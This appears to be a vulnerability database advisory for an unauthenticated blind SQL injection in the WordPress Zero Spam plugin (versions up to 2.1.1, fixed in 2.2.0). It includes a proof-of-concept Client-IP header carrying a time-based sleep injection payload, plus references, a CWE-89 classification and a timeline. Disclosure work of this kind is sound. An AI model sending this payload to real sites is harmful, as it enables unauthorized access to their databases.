WordPress Zero Spam <= 2.1.1 - Unauthenticated Blind SQL Injection



Proof of Concept
 HTTP request header:

Client-IP: '+(select(0)from(select(sleep(10)))v)+'

Affects Plugin

fixed in version 2.2.0

References

URL https://github.com/bmarshall511/wordpress-zero-spam/commit/269ac79aa199da629208190a24114c5551b77c71
URL https://github.com/bmarshall511/wordpress-zero-spam/issues/135
URL https://github.com/bmarshall511/wordpress-zero-spam/pull/138

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Werner Alsemgeest
Views 4133
Verified Yes
WPVDB ID 8608

Timeline

Publicly Published 2016-08-24 (almost 3 years ago)
Added 2016-08-24 (almost 3 years ago)
Last Updated 2016-11-24 (over 2 years ago)